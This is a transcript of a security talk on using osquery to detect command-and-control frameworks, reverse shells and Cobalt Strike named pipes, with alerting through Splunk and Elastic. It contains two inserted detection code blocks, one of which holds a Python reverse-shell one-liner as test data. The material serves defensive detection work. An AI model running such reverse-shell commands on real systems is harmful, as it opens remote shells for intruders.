Hello, everyone, and welcome to my talk, Yeet to Lead with osquery: Effective Threat Hunting Without Breaking the Bank. Let me first start by introducing myself. Who am I? My name is Sebastian Pravas. I'm a lead security engineer at a company called Beacon, and I've also had experience building the security operations function for a financial tech company. In my free time, I like to dabble around with tools and resources in information security. I like to travel the world and I like to go to the gym, sometimes after half a day of work to clear my mind. Now, let me first explain a little bit what my motivation and my thought process for this talk is, why I'm doing this talk. So nowadays, at present, we have lots of EDR, MDR and XDR solutions that are seen as the one-stop solution for security. They are seen as the answer for security, especially for endpoints and devices. Because they are seen as the solution, lots of companies want to compete, so there are also lots of companies presenting their own solution. Some of the more well-known ones are Falcon from CrowdStrike, Singularity from SentinelOne, Carbon Black from VMware, and so on. Because they are seen as the one-stop solution for security, they're sometimes quite expensive. They're quite pricey. But that doesn't bother people; that doesn't bother companies, because people and companies want to stay safe. They think, oh, it's a one-stop solution for security, we don't mind paying for that. But sometimes these solutions still miss common techniques and payloads. They still miss some basic items, basic elements that might slip through the net, and that will give a foothold to potentially malicious actors or red teams. Now, my talk is not to say these solutions are bad, not at all. They're actually quite good. My talk is just to show how osquery can potentially help these solutions, how osquery can complement them.
So basically, to improve security on endpoints and devices, let's make these solutions and osquery work next to each other. Let's make them complement each other to keep everyone as secure as possible. So what can you expect from my talk? First, I'll introduce you to osquery: what is it, who made it, and what are its capabilities? Then I'll go over a few command and control frameworks and their payloads, how to set them up, and what they provide. Why am I doing this? Because I'll use some of them as examples further down the talk. After that, I'll show how osquery can be used to actually catch those command and control frameworks, and right after that I'll also show how you can catch reverse shells. When that's done, I'll show you how you can create alerting pipelines, from osquery finding something when events happen, all the way to alerting your security operations team so they can intervene whenever necessary. Because of course, if something's happening, you want your security operations team to be able to intervene, or to see whether it's a false positive or not. And when that's done, I'll quickly give a short recap of what we've seen across the entire talk.

Let me first start by introducing osquery. What is osquery? osquery is an operating system instrumentation framework that mainly supports Windows, macOS, Linux and FreeBSD. You can potentially support other systems as well, but you would have to compile it yourself. For the four I've mentioned, there are pre-built packages that can be downloaded from the official site. Originally, osquery was made by Facebook. It was made by Facebook because they wanted an easy way to get insight into the overall state of their infrastructure. Nowadays, it's maintained by a separate foundation that was started by Facebook and the Linux Foundation together, to be able to maintain the growing osquery ecosystem.
That foundation that maintains the ecosystem employs multiple developers from Facebook, Google, Kolide, Uptycs, you name it; some companies that use osquery might have a few commits in the core as well. So the big companies that still use osquery nowadays are Netflix, Uber, Airbnb, and Facebook of course, and quite a few others. Now, how does this work? How does osquery actually work? Basically, the operating system is exposed as a relational database with osquery. You can use SQL queries to explore the operating system. You have tables, and most of the tables represent the state of different parts of the system. For example, you have the process list, the running processes: you want to ask for the state of a certain process with osquery. You can also ask which modules are loaded and which are not, or, as another example, the stat command on Linux gives you the current state of a file: the access time, the creation time, the modification time, the permissions. You can do the same thing with a SQL query in osquery.

Now, there are two different kinds of tables. You have event-driven tables and tables that purely show state. As I said before, the state tables are tables that show the state at that point, a snapshot at the moment of what you're asking for. For example, the files, the processes, or installed extensions such as browser extensions. Then you also have event-driven tables. Those tables get their data pushed by underlying operating system APIs. For example, file events: let's say a file is copied into a directory; that's an event. That event will get pushed to the file_events table in osquery. There are multiple tables like that. You have file_events, you have process_events: for example, a process executes a command or moves a file around, and that should be shown in the process_events table. You're basically listening to events on different levels of the operating system.
Now, on Windows, you can make osquery even more powerful by linking it with Sysmon. I'll go deeper into that later, because this will be very useful to catch certain elements. Now, I would like to show a few examples of osquery, how it actually works. My first example is around file information. Like I mentioned before, you can ask for the state of a file with a simple SQL query. As you can see on the slides, I have an example for Windows and for Linux. The query basically asks for the path, the directory, the filename, the inode, the type and the user ID of a file in a certain directory where the filename has to start with the word DEFCON. On Windows, you can see it finds everything, but no user ID, because the user ID field is only filled in on Linux and macOS, never on Windows. On Linux, as you can see, I asked for the same information, just a different path and a different filename, and you can see the user ID field is now not zero but a certain number, which is the user ID that owns the file. Now, this is quite a simple example; let's go to the next one.

The next example is around listening ports. With a simple SQL query you can also say: okay, I want to see every process, or all information about the processes, that listen on a certain port, or processes whose name starts with or contains a certain word. With this query, I'm looking for the address, the port and the path of processes listening on certain ports, where the process name has to contain the word osquery or Splunk. And as you can see, you can even use joins in osquery. This is a simple inner join based on a field that is the same on both tables. On Windows, the result is that there's a Splunk process running, listening on port 8089. On Linux, you'll see that it again finds a Splunk process listening on certain ports.
However, it also finds a socket file, because on Linux, if you query listening ports, you can also see socket files, and osquery listens on a socket file for communication between processes. So this basically shows you how you can combine two tables to gather the information you would like to have.

My third example is quite useful to show as well. On Windows and Linux, you can query for pipes: named pipes, anonymous pipes, open pipes. As we all know, on Windows, certain malware families or command and control frameworks, their agents or stagers, use named or anonymous pipes to communicate with maybe sacrificial processes or with some other part of their code, or whatever. So as an example on Windows, I basically said: give me all information from the table pipes where the name contains my first name, Sebastian, and it gives me three pipes. As we can see, these three pipes with my name are still open, still running. And apparently Microsoft Teams has pipes with my first name, maybe because I use Microsoft Teams. This is on a Windows 11 preview, so maybe that's why; at this moment I should figure that out even more. Now, on Linux, there's a small difference between Linux and Windows, because on Linux you can only query open pipes, but you will never have their names. You will have the process that it might belong to, the inode, the mode, the file descriptor, and sometimes not all the fields are filled in. That's basically what you will see on Linux, so you might have to use some joins to get some more information. But this example shows you how easy it is to also look for open pipes, how easy it is to get that information, which can be useful in the long run.

Now, let's head to the second step: command and control frameworks and their payloads. In this part, I will go over one or two command and control frameworks and the types of payloads, and afterwards, how you can potentially catch them.
Why am I showing these command and control frameworks and payloads? Because I would like to use them as a bit of an example of how you might be able to catch them with osquery. What are command and control frameworks exactly? They can also be seen as post-exploitation frameworks. They are mostly used by bad actors or red teams after they have initially exploited the system of the victim they want to attack. They need some sort of bridge, something that allows them from the outside to get back onto the computer without having to exploit the system again. That's why they use command and control frameworks. Now, these frameworks provide accessible ways for privilege escalation, command execution, pivoting and lateral movement, and so on. They have lots of functionality. They can also be used on multiple operating systems: Linux, macOS, Windows, you name it, and there is probably at least one command and control framework that has some functionality to use on that operating system. A few of the well-known ones are Empire, Mythic, and Cobalt Strike, as everyone knows, and you have a few others like Caldera, Shad0w, and so on.

Now, the first one I'll talk about is Empire. The Empire C2 framework has a Metasploit-like command line interface. There's also a user interface for it called Starkiller, but in this example I will only quickly show what the command line interface looks like. It's a little bit like Metasploit; it has autocompletion and is quite easy to use. Originally, this was a command and control framework with PowerShell for Windows, pure PowerShell, but further down the road it also gained capabilities for Linux and OS X with Python 3. How can you deploy Empire? You can deploy it using Docker, you can use Kali Linux, or you can do it manually, however you like. In my example, I quickly explain how you can deploy it with Docker. So, first you pull the Docker image.
When that's done, you can create a persistent storage volume, so that even when you shut down the Docker instance, the storage with potential payloads and stagers is still there. When that's done, you can basically run the Docker image you pulled in the beginning with the persistent storage, and it will start up the Docker container for Empire. And when it's running perfectly, you can see on the slides what the interface will look like.

Now, Empire has multiple different stagers, so-called agent stagers. Why stagers? Because they are quite small, and when you have a stager executed on the target device, then you can send commands to that stager, commands and code that will come from your Empire control server, basically. Some of the stagers are shellcode, some are done with dynamically linked libraries, you have executable files, macros, you name it. In the screenshot, you can also see the different kinds of stagers that Empire has; most of them are for Windows and macOS. The multi ones, some of them also work on Linux.

Now, the second framework I would like to talk about is the Mythic framework. Mythic is a cross-platform command and control framework. You can basically run it on almost anything, just like Empire, because it runs in Docker containers, Kubernetes-style. It's a bit different from Empire. Empire already provides all the stagers. With Mythic, it's a plug-and-play architecture: you can start with Mythic, and it won't contain anything, but along the way you can add more agents or profiles. How do you deploy it? Again, with Docker. The web interface, the database, the backend: everything runs in a separate Docker container. That's what makes it so modular, the plug-and-play architecture. Now, how do you install this one? First, you clone the repository. Then it has an install script that basically sets up all the components you need, from the database, the queues and listeners to the web interface, everything.
And then you can use its own command line interface to start the entire framework. As a result, you get a nicely pre-built user interface. It's actually quite easy to use; in my opinion, a bit easier than Empire, but to each their own, of course. Now, as I said before, Mythic has a plug-and-play architecture. What do I mean by this? When you install Mythic, you don't have any pre-built agents delivered with Mythic. Nowadays, you can find those agents in separate git repositories from which you can install them. You have agents written in JavaScript for Automation, which is for macOS, in Go, Python, C#/.NET. It's quite easy to install. As an example, I'm showing you how you can install an agent or a profile. For example, I want to install the Apfell agent, which is an agent usable for macOS. I just have to use the command line again and provide the GitHub link to the repository of that agent. I do this and it just works. The same goes for profiles. I want, of course, a command and control profile as well, for HTTP or HTTPS or DNS or something else. All the different profiles are listed in their own git repositories, and you just install them by using the command line again. Now, what's also useful about those agents is the functionality that's built in; they're not just stagers. The stagers are actually agents. For example, the Apfell agent already contains functionality to take screenshots, or other functionality that is maybe not in all other stagers of other frameworks. For example, the Apfell agent from Mythic also contains functionality to take screenshots, to try to elevate your permissions, or to do certain injections and so on.

Now, shall we continue? So now I would like to show you how you can potentially use osquery to catch certain things from those frameworks or other frameworks. There are multiple ways to use osquery.
There are multiple ways you can use osquery to catch IOCs, indicators of compromise: with YARA rules, integrity monitoring, process events. You can easily combine osquery with Sysmon to catch certain IOCs based on events provided by Sysmon. As discussed before, I'll show you how to do that with Sysmon as well, because this creates something quite powerful. I'll also show you how you can catch reverse shell connections with osquery. Let's start with YARA rules. What is YARA? YARA is a way of identifying malware or other files or processes with rule sets. The implementation in osquery is tied to file integrity monitoring. What this basically means is that I can map a directory to certain YARA rule sets, and then when a file gets moved into that directory, or created, or copied, it will trigger the YARA rule: YARA will scan that file, and if the file matches the rule, it will create an event that can potentially be seen as an indicator of compromise. Now, during my investigation for this talk, I found out that specifically the "moved to" file action was not covered by this. This was missing only in the YARA events implementation of osquery. So basically, on Linux or macOS, if you used the move command, the mv command, to move files around, it would never trigger the rule, because osquery wouldn't see it if you wanted to scan those files with YARA. So I made a pull request to the osquery core to fix this, so it would also trigger on "moved to" file actions. This has been accepted last night and should arrive in the next version of osquery as well, for even better protection with YARA rules. Now you could also ask, why not "moved from" file actions? Well, "moved from" means that you move a file away from the directory you're monitoring, and since you only scan files in a directory, it makes no sense to also cover "moved from".
Now let me show you an example of what a YARA rule configuration looks like, what it can potentially do, and what the result looks like. So here is a very, very small rule that I've written as an example for this talk, which basically should detect the Empire Windows shellcode stager for 64-bit systems. As a reference, I used the GitHub link to the Empire command and control framework. It basically says that if the two strings you see on screen are seen in the file by YARA, then it will trigger an event, because that means the file matches the YARA rule. The first string is "mini Empire DLL", which is always in those 64-bit Windows shellcode stagers, and the second is a series of bytes that can be seen with a hex editor. So if both strings are present in the file, it will trigger the rule and create an event. What does it look like as a result? As an example, I basically copied the stager file to a Linux system to show it there. You use the directory /home/shadow and you monitor that with YARA events. And the moment I copy the Empire shellcode .bin file into that directory, the YARA implementation will scan that file. When it scans it, it will trigger the rule because it matches the strings in the rule. As a result, you can look at the table called yara_events, and you can see that in that directory our file appeared and was then updated, and that it matches that rule. Like that, we have a detection. Now, this can then be shown later on, with alerting, to other people or to your security operations team, because then they see there's a suspicious file, maybe we should do something about it. If you don't use YARA rules, you might miss out on certain files from certain command and control frameworks. However, most of the command and control frameworks don't have YARA rules defined for them, so you would potentially have to write them yourself, or maybe someone else can do that.
I created rules to give you an example of how you can use the powerful functionality of YARA to monitor directories and files.

The next function in osquery I want to talk about is file integrity monitoring. How could file integrity monitoring potentially be used to monitor for suspicious files? File integrity monitoring monitors directories for file changes. We can do it on one level or even recursively. It can be used to monitor sensitive directories; for example, on macOS, you have the LaunchAgents directory and the LaunchDaemons directory, or on Linux, for example, /etc or /usr/lib. This file integrity monitoring also monitors the "moved to" and "moved from" file actions, not just update, create or modify, because the implementation of file integrity monitoring with YARA rules is different from the actual file integrity monitoring in osquery in general. Now, this is a simple example to show you how you could configure which directories osquery should look at. As you can see here, I'm telling the osquery on my laptop to check different directories: the temp folder, my workspace folder, which contains most of my source code and stuff, to make sure nothing weird happens that I don't know about, or the LaunchAgents folder, for example. As you can see in the last part, it says /Users and then a percent sign. That basically means that in the Users folder, for every user, I want to monitor the LaunchAgents directory. Now, what does it actually look like if a file enters one of those directories? As you saw in the last part of my configuration, I was monitoring the LaunchAgents directory for every single user. So what I did was, I used the Mythic framework to generate an actual payload, executed that on the MacBook, and then from my command and control server, I said: great, enable persistence on my victim, my MacBook.
For persistence, it creates a launch agent that, this time, I called com.devcom.cf.h2p, which was placed in the LaunchAgents folder of my own personal user. And because I was monitoring that, osquery saw this. Even with this, this event can be reported to something like Splunk or Elasticsearch, and then maybe a security operations team can look at it and say: hey, there's a suspicious file that appeared here that I don't know about, we should investigate this.

Now, the next example is process events. osquery also has the capability to monitor process events. It can monitor process execution. It can monitor execution from a parent process or from a child process and still see what the parent process is, which can be quite useful. Or, for example, it can monitor for osascript on macOS, or PowerShell execution on Windows, or on Linux, let's say, command line execution of Python or something else. Two examples I could come up with were HiddenLotus and Lamepyre, two malware families for Mac. Why this example? Because in the complete process tree, both of them use osascript to execute certain actions. So if you monitor for unauthorized osascript execution, you might have caught these two families if you were infected with them. Now, what does this look like? Basically, I tell osquery every 60 seconds: give me all information from process_events where the command line contains the word "osa", because "osa" is the first few letters of osascript, which is the command for osascript execution. And the moment osquery finds something, it will look like the result you see on the screen. Now, as we've seen before with file integrity monitoring, I executed a malicious payload and then gained persistence. The command line script you see here was the first step: first I had to download the payload from somewhere, which I did with osascript, and then I executed it.
And as you see, osquery caught this from me, and all the information can then again be sent to Splunk, Elasticsearch, or anything else that will allow you to intervene if necessary, or at least isolate the device and then investigate how far they got before you got to the device. It can also be used to monitor, for example, PowerShell execution, Python execution with commands, or, for example, decoding of base64 strings, which a normal user wouldn't necessarily do, stuff like that. It can be used for quite a lot of things, but you have to be aware that you don't run too many queries at the same time, because you don't want to hog too many resources on the device. Even though this is quite powerful, you can even combine some queries so that you don't have too many queries running at the same time.

Another example I would like to show you, which is actually quite powerful and which I talked about before, is osquery combined with Sysmon. Now, you're wondering why this is so powerful. As you all know, Sysmon logs a large amount of system activity. It stays active across reboots because it is also a device driver. Now, what kind of events can Sysmon monitor for? Process injection, CreatePipe, and quite a lot of other things. I talked to a friend earlier and told him, yeah, with the combination of osquery and Sysmon I can catch process injection. However, it doesn't cover user APC calls. Sometimes, for process injection, you use the CreateRemoteThread functionality. User APC calls basically abuse already existing threads instead of creating new ones, and Sysmon cannot see that yet. Now, how would you tie Sysmon in with osquery? Sysmon saves all its events in the Windows event log under the channel Microsoft-Windows-Sysmon/Operational. osquery can tap into Windows event channels, and into that specific channel. So every time there's a new event in there, it will also appear in osquery.
And osquery can parse that Sysmon event data, create an event out of it and send it to Splunk again, or Elasticsearch, or something else. Now, how do you set up Sysmon to work with osquery? There used to be a very good standard Sysmon config made by SwiftOnSecurity, but nowadays someone forked it, merged some pull requests and made it even better: the GitHub repository you can see on the screen. Now, to enable osquery to monitor the Windows event channel that contains all Sysmon events, you just add the flag to the command line or to the flags file, you restart osquery, and it can do that. And then, as we've seen before with all those examples, we can, let's say, run a query every 60 seconds that looks at the windows_events table and selects all events that don't have event ID 10. For example, event ID 17 is CreatePipe, event ID 18 is ConnectPipe, event ID 23 is DNS events, if I'm not mistaken.

These are examples of CreatePipe. As most of us know, Cobalt Strike is used by red teams for adversary emulation, but nowadays it's also used by the bad guys, because it's quite easy to use and quite powerful as well. Cobalt Strike uses pipes, named and unnamed, for communication between the main beacon and sacrificial processes. An example is a pipe with the default value MSSE-<number>-server that's used to run the shellcode. Now, you would say that's a default value. Yeah, but not everyone changes the default values of the pipe names. So these rules for Sysmon, these events in Sysmon, most of the time still contain the default names. Some people might change the names, but then you have to find a more creative way to still catch those pipes. So I basically infected myself with a Cobalt Strike beacon, and from my command and control laptop, my team server, I created the beacon, executed it on my Windows device, and it connected back to my team server.
And as you see, it spawned for me a named pipe called MSSE-7000-server, as you can see in the screenshots. This gets caught by Sysmon, and you'll see it as well. Again, we can send these to Splunk or Elasticsearch.

Then you can imagine another example that I want to show you that can get caught by Sysmon: process injection. For this, I infected another device with the Apollo Mythic agent. It uses process injection to execute certain tasks. For example, here I said: take a screenshot for me and inject yourself into the process toolbox.exe, which is a tool from JetBrains to maintain multiple IDEs. As a result, as you can see on the screen, osquery again picked it up and told me the technique, T1055, and the name, process injection. It tells me what tool was used to do the process injection, the source. It also tells me which process it's trying to inject code into, and so on. So even these events we can now have osquery send straight to Splunk, Elasticsearch or something else and then alert on again.

Now, I really want to talk about reverse shells as well. Reverse shells are quite common, because sometimes you have red teams or bad guys who would like a connection from a device back to their own server. What are reverse shells used for? A session established from the victim to the attacker. This is a solution when the victim's device is not directly reachable; maybe it's behind NAT or something else. If you initially infect the victim but you can't directly connect to it, you need a reverse shell, so you can open a reverse shell and send it straight back. Now, most reverse shells are without a TTY. A TTY basically allows you to enhance the functionality of the shell you have. Reverse shells can be launched in multiple different ways: for example, Netcat, Python, Perl, Bash. Most languages can spawn a reverse shell in their own way.
I'll show a few examples and afterwards how we can catch them as well. These are three examples. Python and Perl are almost the same, just a different language. The Bash one is quite a bit simpler. Of those three, there's only one that will give you a shell with a TTY, which is the Bash version, because, if I'm not mistaken, you can only get a TTY if the parent process has a TTY as well. So if one spawns a reverse shell, only if the parent process already has a TTY can you use the enhanced functionality in your shell. Now, let's quickly analyze how, for example, Python would launch a reverse shell. It has no access to a TTY because the parent process, Python itself, doesn't have any connection to a TTY. It spawns a reverse shell to port 1111 on IP 10.0.0.123, and we want all input, output and errors sent straight to the socket file descriptor, to our reverse shell back at the command and control server, not to the victim, so the victim won't see that something's going on. So it redirects stdin, stdout and stderr to the file descriptor, closes the original ones, and then spawns the shell with /bin/sh -i.

Now, of course, with osquery, you want to be able to catch those things. So this is quite a large query that combines three tables: processes, process_open_sockets and process_open_files. With this query, we can see if there's potentially a shell running: that's where the process_open_files entry has file descriptor zero and the name contains either sh or bash. Now, because Python will spawn a reverse shell that is called like this, this is the result, of course. We see that it spawns a reverse shell to IP 51.210 and so on, on port 1111. We can see that the command line is /bin/sh -i, and we can see in the parent command line the entire reverse shell with Python that we executed. Now, I would like to mention as well that this was a test on macOS.
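The reverse-shell hunt described above, as an added example that is not part of the talk and not the speaker's query: the three-table join is written as one osquery query and exercised against an in-memory SQLite copy of the tables it touches. osquery's SQL dialect is SQLite, so REVERSE_SHELL_QUERY can be pasted into osqueryi unchanged; the schema and rows below are constructed stand-ins carrying only the columns the query needs (the real tables have many more), and the signature it hunts for, a shell whose stdin/stdout/stderr is a connected socket and not a terminal, is my reading of the dup2() trick walked through above.

```python
"""Added example: hunt for reverse shells with an osquery-style join,
run here against an in-memory SQLite copy of three osquery tables.
"""
import sqlite3

# Constructed subset of osquery's schema; column names are osquery's own.
SCHEMA = """
CREATE TABLE processes (pid INTEGER, parent INTEGER, name TEXT, path TEXT, cmdline TEXT);
CREATE TABLE process_open_sockets (pid INTEGER, fd INTEGER, local_address TEXT,
    local_port INTEGER, remote_address TEXT, remote_port INTEGER, state TEXT);
CREATE TABLE process_open_files (pid INTEGER, fd INTEGER, path TEXT);
"""

# The dup2() trick leaves the socket on fds 0-2 of the spawned shell, so a
# shell with a connected socket on fd 0/1/2 whose stdin is not a /dev/tty*
# is what we look for. parent_cmdline shows what launched it.
REVERSE_SHELL_QUERY = """
SELECT p.pid, p.parent, p.name, p.cmdline,
       pp.cmdline AS parent_cmdline,
       s.fd, s.remote_address, s.remote_port,
       f.path AS stdin_path
FROM processes p
JOIN process_open_sockets s ON s.pid = p.pid
LEFT JOIN processes pp ON pp.pid = p.parent
LEFT JOIN process_open_files f ON f.pid = p.pid AND f.fd = 0
WHERE p.name IN ('sh', 'bash', 'zsh', 'dash', 'ksh')
  AND s.fd <= 2
  AND s.remote_port != 0
  AND (f.path IS NULL OR f.path NOT LIKE '/dev/tty%')
"""

# Constructed sample rows: pid 4242 is the "/bin/sh -i" spawned by a Python
# reverse shell to 10.0.0.123:1111; pid 900 is an ordinary interactive bash
# on a terminal; pid 1200 is a normal outbound HTTPS client.
PY_ONE_LINER = (
    "python3 -c \"import socket,os,subprocess;s=socket.socket();"
    "s.connect(('10.0.0.123',1111));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];"
    "subprocess.call(['/bin/sh','-i'])\""
)
SAMPLE_ROWS = {
    "processes": [
        (4200, 1, "python3", "/usr/bin/python3", PY_ONE_LINER),
        (4242, 4200, "sh", "/bin/sh", "/bin/sh -i"),
        (900, 1, "bash", "/bin/bash", "-bash"),
        (1200, 1, "curl", "/usr/bin/curl", "curl https://example.invalid/"),
    ],
    "process_open_sockets": [
        (4242, 0, "10.0.0.50", 49152, "10.0.0.123", 1111, "ESTABLISHED"),
        (1200, 3, "10.0.0.50", 49153, "203.0.113.10", 443, "ESTABLISHED"),
    ],
    "process_open_files": [
        (900, 0, "/dev/ttys001"),
        (1200, 0, "/dev/null"),
    ],
}


def build_sample_db() -> sqlite3.Connection:
    """Load the constructed rows into an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.executescript(SCHEMA)
    for table, rows in SAMPLE_ROWS.items():
        marks = ",".join("?" * len(rows[0]))
        conn.executemany(f"INSERT INTO {table} VALUES ({marks})", rows)
    return conn


def find_reverse_shells(conn: sqlite3.Connection) -> list:
    """Run the hunt query and return each hit as a plain dict."""
    return [dict(row) for row in conn.execute(REVERSE_SHELL_QUERY)]


if __name__ == "__main__":
    for hit in find_reverse_shells(build_sample_db()):
        print(f"pid {hit['pid']} ({hit['name']}) -> "
              f"{hit['remote_address']}:{hit['remote_port']}")
        print(f"  spawned by: {hit['parent_cmdline']}")
```

Only the `sh -i` child is reported; the Python parent holding the same socket is not, because the name filter is on shells. Widening the IN list to interpreters (python, perl) catches the parent too at the cost of more noise, and the exclusion on `/dev/tty%` is what keeps the interactive bash on a terminal out of the results, which matters on macOS where the talk notes the shell names and paths differ from Linux.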
The queries also depend quite a bit on the operating system, how it operates, what they're connected to and what they look like, so you might have to tune these queries for other operating systems. In this case, there might be a little difference on Windows again. This is just an example of how you can catch a reverse shell on macOS.

Now, let's go to the final piece of my talk: alerting. We've seen how command and control frameworks are used and how they work. We've seen how osquery works. We've seen multiple ways we can catch certain elements from frameworks and certain IOCs with osquery: YARA rules, file integrity monitoring, Sysmon; you can catch reverse shells if you find the right queries, and so on. But we also want to monitor everything and make sure that you can alert on it. So alerting should be the next step. You now have an event that has been detected. What's next? The detection is only a small part. You want to empower your security team; you want to make sure that they know what's happening so they can intervene as soon as possible. I have two small examples, with Splunk and with Elasticsearch, to show you. This is a small pipeline, the whole pipeline with Splunk, in four elements. On the endpoints we have osquery running, and on all the endpoints there is also a Splunk forwarder, the universal forwarder, which is the most lightweight forwarder they have. osquery basically sends the results of all the scheduled queries it runs constantly to a log file. The universal forwarder monitors that file. Every new item it sees, if it matches the rule set it has, it will send to the Splunk instance. Now, the Splunk instance will gather all the data, and in the Splunk instance we can create some alerts. Let's say I want to alert on process injection or on pipes; then Splunk can send an alert to Slack or PagerDuty. What does it look like, you say? This is a small example of how this might look.
For example, on the universal forwarder, here is the osquery output of an event where Sysmon potentially saw a possible Cobalt Strike post-exploitation job. How did it start? Because it saw a pipe name that looked like a Cobalt Strike pipe name: "postex_" and then four random characters. This is the default pipe name that Cobalt Strike uses for post-exploitation jobs. So osquery, via the universal forwarder, sends this data to Splunk. And you can see that there is an alert created on Splunk that will alert in real time if it gets an event that meets certain conditions. And to the right, the last part, you can see what it looks like in Slack. So this goes from osquery to an alert in Splunk that triggers and sends a message to Slack. In the Slack message you can see "potential Cobalt Strike named pipe detected", where it was detected, the technique name, the pipe name, the image, potentially the file version if there is any, and a link to the specific event of the alert. Now, the next pipeline I would like to show you is with the ELK stack. Basically we could say Elasticsearch and Kibana, because I don't use Logstash in this case. Here we use osquery in combination with Filebeat, and again osquery has scheduled queries that put data in a log file. Filebeat monitors the log file and sends the data it needs to Elasticsearch. Elasticsearch holds all the data, and Kibana has alerting functionality that can, for example, send the data to Slack, PagerDuty, or anything else we can imagine. Now, what does this look like? Again, we have an event, and this time I took an event that was triggered on a YARA rule. So again, for the Empire shellcode stager there is a YARA rule, and we see it was triggered in a home directory and which YARA rule matched, the Empire shellcode one, and you have two strings. Now, it sends the data to Elasticsearch, and next you can see that I created a rule that will trigger on these events.
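The named-pipe side of that pipeline can also be collected by osquery itself on Windows; here is an added example (not from the talk) that lists pipes matching the default "postex_" plus four characters pattern the talk describes, together with the process that owns them. It uses osquery's pipes and processes tables; the GLOB pattern is this example's choice.

```sql
-- Added example, not the talk's own query. Windows osquery: named pipes whose
-- name matches the default Cobalt Strike post-exploitation pipe pattern the talk
-- describes ("postex_" followed by four characters), with the owning process.
-- GLOB is used instead of LIKE: in LIKE, '_' is a wildcard, while in GLOB '_'
-- is literal and '?' matches exactly one character. The leading '*' tolerates
-- either a bare pipe name or a \\.\pipe\ prefix in the name column.
SELECT
  pi.pid,
  pi.name          AS pipe_name,
  pi.instances,
  pr.name          AS image,
  pr.path,
  pr.cmdline,
  pr.parent,
  pp.name          AS parent_image,
  pp.path          AS parent_path
FROM pipes pi
JOIN processes pr
  ON pr.pid = pi.pid
LEFT JOIN processes pp
  ON pp.pid = pr.parent
WHERE pi.name GLOB '*postex_????';
```

Scheduled at a short interval, a hit produces a results-log line carrying image, path and pipe name, the same fields the Slack message above surfaces.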
Now, that rule, when it sees at least one event, will send an alert to PagerDuty, which then maybe sends a message to my Slack or to my cell phone or anything else to tell me a YARA rule was triggered and maybe this should be investigated. Of course, it can be used, for example, to trigger the operations team or whoever is on call: they get a message on the phone, a phone call from the system telling them something happened, they investigate these alerts and they can acknowledge, resolve, or anything else. Now we've seen that an event found by osquery can be sent to Splunk, for example, and on to Slack or PagerDuty to do alerting on certain events that were found by Sysmon or osquery. But there is a next step as well. What is next? Maybe SOAR. SOAR stands for Security Orchestration, Automation and Response. Now, there are different solutions: for example Phantom by Splunk, Cortex XSOAR by Palo Alto, AlienVault USM, and so on. What is the advantage of SOAR? Basically, they allow you to automate tedious tasks, or tasks that normally your security operations team does. As an example, Phantom with its playbooks. Let's say for every file osquery sees on a system that triggers a YARA rule, it sends data to Splunk. Splunk sees this and sends an alert to Slack. At the same time, there is also a playbook in Phantom. Now Phantom can say, oh, interesting, and see which host it is on. If Phantom can potentially connect to that host, it can grab the file and detonate it to see what the file actually does and whether it really is malicious. And if it sees, oh, this is a bad file, it can maybe react and automatically contain the device the file was found on, or alert security that this is really dangerous, before the security team has even had the chance to react.
SOAR platforms can be used to improve the quality of life for security operations teams and to prevent alert fatigue. Some security operations teams get so many alerts that they cannot dive into them all and there is a huge backlog. So SOAR platforms can help here to make the backlog smaller and take over certain tasks that security operations teams don't have the energy or the capacity for. So I think SOAR platforms are a really good use and could potentially help these teams a lot. Now, this was my talk, so what have we seen today? What is osquery, who made it and what is it made for? How does it work and what does it do? Afterwards, we've seen how some command and control frameworks can be set up, which ones exist and how the payloads might work. We've also seen how we can catch IOCs with osquery. We've quickly seen how reverse shells can be spawned and how we can catch those reverse shells as well. I also went over how you can set up certain alerting pipelines and how they should work to alert on certain events that osquery or Sysmon has seen. And in the end, I quickly went over how SOAR platforms can improve the quality of life for security operations teams. These are some of the resources I used. I put them here on the slide because I believe in attribution, or credit where credit is due. I would like to thank you all for listening to my talk. I hope you learned something. And if you would like to chat with me, you can find me on the internet somewhere or in the speaker channel on this call as well. Thank you all and see you next time. These are also my contact details. I would love to talk to you.